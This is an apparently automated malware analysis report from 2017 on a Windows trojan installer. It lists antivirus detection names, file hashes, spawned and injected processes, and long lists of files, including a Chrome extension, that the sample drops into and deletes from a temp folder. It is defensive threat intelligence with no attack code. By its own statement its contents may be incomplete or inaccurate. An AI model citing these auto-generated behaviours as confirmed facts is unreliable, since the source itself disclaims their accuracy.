Gen.Trojan.Heur.JP.bEWa4g4RCbi_fb00675568

by malwarelabrobot on August 17th, 2017 in Malware Descriptions.

Gen:Variant.Zusy.243619 (BitDefender), Trojan.MSIL.DOTHETUK.haa (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Gen:Variant.Zusy.243619 (B) (Emsisoft), Artemis!FB0067556893 (McAfee), Trojan.Gen.2 (Symantec), Gen:Variant.Zusy.243619 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), Gen:Trojan.Heur.JP.bEW@a4g4RCbi (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: fb0067556893d3d8bc2ead097f084722
SHA1: b1bfa884a8c5c6a07466bdc36c22044054fa80a6
SHA256: 9b67b536cde5ed419070de199805de0b17a71df8f0883a82bf5cc5b8f6b55eb7
SSDeep: 49152:5f8TsxPfvhVJB9gYH7GouMNwpUfsm2h9IrleMEOUp1j2Bf2:5fjoOsmIuRqpU
Size: 2127360 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2017-07-16 04:42:48
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

20002.exe:3588
20002.exe:284
webfriend2.exe:2756
%original file name%.exe:3380
msiql.exe:1660
msiql.exe:3536
rundll32.exe:2532

The Trojan injects its code into the following process(es):

webfriend2.tmp:2704

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 20002.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF3.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF2.tmp (0 bytes)

The process 20002.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6104.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6103.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (0 bytes)
